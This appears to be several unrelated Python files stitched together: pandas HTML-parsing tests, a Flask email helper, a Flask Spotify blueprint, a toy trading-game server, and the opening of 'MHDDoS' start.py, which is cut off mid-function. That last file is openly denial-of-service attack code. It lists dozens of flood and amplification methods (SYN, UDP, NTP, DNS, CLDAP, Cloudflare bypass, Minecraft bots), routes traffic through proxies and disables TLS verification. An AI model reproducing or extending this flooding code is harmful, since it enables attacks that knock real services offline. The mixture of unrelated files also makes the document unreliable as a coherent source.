# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
expected = DataFrame(
[["a", "b"]],
columns=MultiIndex.from_tuples(
[("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
),
)
tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
@pytest.mark.filterwarnings(
"ignore:You provided Unicode markup but also provided a value for "
"from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
def __iter__(self):
# to fool `is_file_like`, should never end up here
assert False
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from api.app import mail
def send_async_email(app, to, subject, template, **kwargs):
with app.app_context(): # pragma: no cover
msg = Message(subject, recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
mail.send(msg)
def send_email(to, subject, template, **kwargs): # pragma: no cover
app = current_app._get_current_object()
thread = Thread(target=send_async_email, args=(app, to, subject, template),
kwargs=kwargs)
thread.start()
return thread
|
spotify.py | #!/usr/bin/env python
from app import lego
from app import webhook
from flask import Blueprint, request, render_template, \
flash, g, session, redirect, url_for, \
current_app
from urllib.request import urlopen
import io
import logging
import os
import sqlite3
import tekore as tk
import threading
logger = logging.getLogger(__name__)
spotify = Blueprint('spotify', __name__)
VERSION = current_app.config['VERSION']
conf = (current_app.config['CLIENT_ID'],
current_app.config['CLIENT_SECRET'],
current_app.config['REDIRECT_URI']
)
cred = tk.Credentials(*conf)
tkspotify = tk.Spotify()
users = {}
current_dir = os.path.dirname(os.path.abspath(__file__))
cache_lock = threading.Lock()
def init_cache():
"""Use a database to store song meta data to reduce API calls.
"""
global connection
global cursor
cache_dir = current_dir + '/.cache'
os.makedirs(cache_dir, exist_ok=True)
connection = sqlite3.connect(cache_dir + '/songs.db', check_same_thread=False)
cursor = connection.cursor()
cursor.execute("create table if not exists song \
(id text, \
image_url text, \
artist text, \
name text, \
duration integer)")
def connectLego():
legoThread = threading.Thread(target=lego.Base, args=())
legoThread.start()
init_cache()
connectLego()
def activated():
try:
user
except NameError:
logger.error('Spotify not activated. Visit %s' % conf[2].replace('callback',''))
return False
else:
return True
def pause():
if conf[0] == '':
return
try:
user
except NameError:
return
if user_token(user) is None:
logger.error('No Spotify token found.')
return ''
with tkspotify.token_as(users[user]):
try:
tkspotify.playback_pause()
except Exception:
pass
def resume():
if conf[0] == '':
return
try:
user
except NameError:
return 0
if user_token(user) is None:
logger.error('No Spotify token found.')
return ''
sp_remaining = 60000
with tkspotify.token_as(users[user]):
try:
tkspotify.playback_resume()
song = tkspotify.playback_currently_playing()
sp_elapsed = song.progress_ms
sp_id = song.item.id
cursor.execute("""select duration from song where id = ?;""", (sp_id,))
row = cursor.fetchone()
sp_remaining = row[0] - sp_elapsed
except Exception:
pass
return sp_remaining
def spotcast(spotify_uri,position_ms=0):
"""Play a track, playlist or album on Spotify.
"""
global users
global user
if conf[0] == '':
return 0
try:
user
except NameError:
logger.warn('Spotify not activated. Please visit: URL')
return 0
if user_token(user) is None:
logger.error('No Spotify token found.')
return 0
uri = spotify_uri.split(':')
with tkspotify.token_as(users[user]):
try:
if uri[0] == 'track':
tkspotify.playback_start_tracks([uri[1]],position_ms=position_ms)
else:
tkspotify.playback_start_context('spotify:' + spotify_uri,position_ms=position_ms)
except Exception as e:
logger.error("Could not cast to Spotify.")
logger.error(e)
return -1
try:
cursor.execute("""select * from song where id = ?;""", (uri[1],))
row = cursor.fetchone()
except Exception as e:
logger.error(e)
row = None
return 60000
if row is None:
return 60000
artist = row[2]
name = row[3]
duration_ms = row[4]
logger.info('Playing %s.' % name)
return duration_ms
return 0
@spotify.route('/', methods=['GET'])
def main():
global user
user = session.get('user', None)
if user == None:
# Auto login
return redirect('/login', 307)
return render_template("index.html", user=user)
@spotify.route('/login', methods=['GET'])
def login():
if conf[0] == '':
session['user'] = 'local'
return redirect('/', 307)
else:
auth_url = cred.user_authorisation_url(scope=tk.scope.every)
return redirect(auth_url, 307)
@spotify.route('/callback', methods=['GET'])
def login_callback():
global users
code = request.args.get('code', None)
token = cred.request_user_token(code)
with tkspotify.token_as(token):
info = tkspotify.current_user()
session['user'] = info.id
users[info.id] = token
logger.info('Spotify activated.')
return redirect('/', 307)
def user_token(user):
if user == 'local':
return None
if user is not None:
token = users[user]
if token.is_expiring:
token = cred.refresh(token)
users[user] = token
return users[user]
else:
return None
@spotify.route('/nowplaying')
def nowplaying():
"""Display the Album art of the currently playing song.
"""
try:
if user_token(user) is None:
return ''
except Exception:
return ''
with tkspotify.token_as(users[user]):
try:
song = tkspotify.playback_currently_playing()
except Exception as e:
logger.error('Spotify could not find any track playing: %s' % e)
return render_template('nowplaying.html')
if (song is None) or (not song.is_playing):
return render_template('nowplaying.html')
# The cache_lock avoids the "recursive use of cursors not allowed" exception.
try:
cache_lock.acquire(True)
cursor.execute("""select * from song where id = ?;""", (song.item.id,))
except Exception as e:
logger.error("Could not query cache database: %s" % e)
return render_template('nowplaying.html')
finally:
cache_lock.release()
row = cursor.fetchone()
if row is None:
track = tkspotify.track(song.item.id)
images_url = track.album.images
image_url = images_url[0].url
name = track.name
duration_ms = track.duration_ms
artists = ''
for item in track.artists:
artists += item.name + ', '
artist = artists[:-2]
cursor.execute("""insert into song values (?,?,?,?,?);""",
(song.item.id,image_url,artist,name,duration_ms))
connection.commit()
else:
song.item.id = row[0]
image_url = row[1]
artist = row[2]
name = row[3]
duration_ms = row[4]
return render_template("nowplaying.html",
image_url=image_url,
artist=artist,
name=name)
|
server.py | ################################################################################
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from itertools import izip
from random import normalvariate, random
from datetime import timedelta, datetime
import csv
import dateutil.parser
import os.path
import operator
import json
import re
import threading
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from SocketServer import ThreadingMixIn
################################################################################
#
# Config
# Sim params
REALTIME = True
SIM_LENGTH = timedelta(days = 365 * 5)
MARKET_OPEN = datetime.today().replace(hour = 0, minute = 30, second = 0)
# Market parms
# min / max / std
SPD = (2.0, 6.0, 0.1)
PX = (60.0, 150.0, 1)
FREQ = (12, 36, 50)
# Trades
OVERLAP = 4
################################################################################
#
# Test Data
def bwalk(min, max, std):
""" Generates a bounded random walk. """
rng = max - min
while True:
max += normalvariate(0, std)
yield abs((max % (rng * 2)) - rng) + min
def market(t0 = MARKET_OPEN):
""" Generates a random series of market conditions,
(time, price, spread).
"""
for hours, px, spd in izip(bwalk(*FREQ), bwalk(*PX), bwalk(*SPD)):
yield t0, px, spd
t0 += timedelta(hours = abs(hours))
def orders(hist):
""" Generates a random set of limit orders (time, side, price, size) from
a series of market conditions.
"""
for t, px, spd in hist:
stock = 'ABC' if random() > 0.5 else 'DEF'
side, d = ('sell', 2) if random() > 0.5 else ('buy', -2)
order = round(normalvariate(px + (spd / d), spd / OVERLAP), 2)
size = int(abs(normalvariate(0, 100)))
yield t, stock, side, order, size
################################################################################
#
# Order Book
def add_book(book, order, size, _age = 10):
""" Add a new order and size to a book, and age the rest of the book. """
yield order, size, _age
for o, s, age in book:
if age > 0:
yield o, s, age - 1
def clear_order(order, size, book, op = operator.ge, _notional = 0):
""" Try to clear a sized order against a book, returning a tuple of
(notional, new_book) if successful, and None if not. _notional is a
recursive accumulator and should not be provided by the caller.
"""
(top_order, top_size, age), tail = book[0], book[1:]
if op(order, top_order):
_notional += min(size, top_size) * top_order
sdiff = top_size - size
if sdiff > 0:
return _notional, list(add_book(tail, top_order, sdiff, age))
elif len(tail) > 0:
return clear_order(order, -sdiff, tail, op, _notional)
def clear_book(buy = None, sell = None):
""" Clears all crossed orders from a buy and sell book, returning the new
books uncrossed.
"""
while buy and sell:
order, size, _ = buy[0]
new_book = clear_order(order, size, sell)
if new_book:
sell = new_book[1]
buy = buy[1:]
else:
break
return buy, sell
def order_book(orders, book, stock_name):
""" Generates a series of order books from a series of orders. Order books
are mutable lists, and mutating them during generation will affect the
next turn!
"""
for t, stock, side, order, size in orders:
if stock_name == stock:
new = add_book(book.get(side, []), order, size)
book[side] = sorted(new, reverse = side == 'buy', key = lambda x: x[0])
bids, asks = clear_book(**book)
yield t, bids, asks
################################################################################
#
# Test Data Persistence
def generate_csv():
""" Generate a CSV of order history. """
with open('test.csv', 'wb') as f:
writer = csv.writer(f)
for t, stock, side, order, size in orders(market()):
if t > MARKET_OPEN + SIM_LENGTH:
break
writer.writerow([t, stock, side, order, size])
def read_csv():
""" Read a CSV or order history into a list. """
with open('test.csv', 'rb') as f:
for time, stock, side, order, size in csv.reader(f):
yield dateutil.parser.parse(time), stock, side, float(order), int(size)
################################################################################
#
# Server
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
""" Boilerplate class for a multithreaded HTTP Server, with working
shutdown.
"""
allow_reuse_address = True
def shutdown(self):
""" Override MRO to shutdown properly. """
self.socket.close()
HTTPServer.shutdown(self)
def route(path):
""" Decorator for a simple bottle-like web framework. Routes path to the
decorated method, with the rest of the path as an argument.
"""
def _route(f):
setattr(f, '__route__', path)
return f
return _route
def read_params(path):
""" Read query parameters into a dictionary if they are parseable,
otherwise returns None.
"""
query = path.split('?')
if len(query) > 1:
query = query[1].split('&')
return dict(map(lambda x: x.split('='), query))
def get(req_handler, routes):
""" Map a request to the appropriate route of a routes instance. """
for name, handler in routes.__class__.__dict__.iteritems():
if hasattr(handler, "__route__"):
if None != re.search(handler.__route__, req_handler.path):
req_handler.send_response(200)
req_handler.send_header('Content-Type', 'application/json')
req_handler.send_header('Access-Control-Allow-Origin', '*')
req_handler.end_headers()
params = read_params(req_handler.path)
data = json.dumps(handler(routes, params)) + '\n'
req_handler.wfile.write(data)
return
def run(routes, host = '0.0.0.0', port = 8080):
""" Runs a class as a server whose methods have been decorated with
@route.
"""
class RequestHandler(BaseHTTPRequestHandler):
def log_message(self, *args, **kwargs):
pass
def do_GET(self):
get(self, routes)
server = ThreadedHTTPServer((host, port), RequestHandler)
thread = threading.Thread(target = server.serve_forever)
thread.daemon = True
thread.start()
print 'HTTP server started on port 8080'
while True:
from time import sleep
sleep(1)
server.shutdown()
server.start()
server.waitForThread()
################################################################################
#
# App
ops = {
'buy': operator.le,
'sell': operator.ge,
}
class App(object):
""" The trading game server application. """
def __init__(self):
self._book_1 = dict()
self._book_2 = dict()
self._data_1 = order_book(read_csv(), self._book_1, 'ABC')
self._data_2 = order_book(read_csv(), self._book_2, 'DEF')
self._rt_start = datetime.now()
self._sim_start, _, _ = self._data_1.next()
self.read_10_first_lines()
@property
def _current_book_1(self):
for t, bids, asks in self._data_1:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
@property
def _current_book_2(self):
for t, bids, asks in self._data_2:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
def read_10_first_lines(self):
for _ in xrange(10):
self._data_1.next()
self._data_2.next()
@route('/query')
def handle_query(self, x):
""" Takes no arguments, and yields the current top of the book; the
best bid and ask and their sizes
"""
try:
t1, bids1, asks1 = self._current_book_1.next()
t2, bids2, asks2 = self._current_book_2.next()
except Exception as e:
print "error getting stocks...reinitalizing app"
self.__init__()
t1, bids1, asks1 = self._current_book_1.next()
t2, bids2, asks2 = self._current_book_2.next()
t = t1 if t1 > t2 else t2
print 'Query received @ t%s' % t
return [{
'id': x and x.get('id', None),
'stock': 'ABC',
'timestamp': str(t),
'top_bid': bids1 and {
'price': bids1[0][0],
'size': bids1[0][1]
},
'top_ask': asks1 and {
'price': asks1[0][0],
'size': asks1[0][1]
}
},
{
'id': x and x.get('id', None),
'stock': 'DEF',
'timestamp': str(t),
'top_bid': bids2 and {
'price': bids2[0][0],
'size': bids2[0][1]
},
'top_ask': asks2 and {
'price': asks2[0][0],
'size': asks2[0][1]
}
}]
################################################################################
#
# Main
if __name__ == '__main__':
if not os.path.isfile('test.csv'):
print "No data found, generating..."
generate_csv()
run(App())
|
start.py | #!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from random import choice as randchoice
from random import randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter(object):
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return "".join([chr(randint(0, 1000)) for _ in range(lengh)]).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
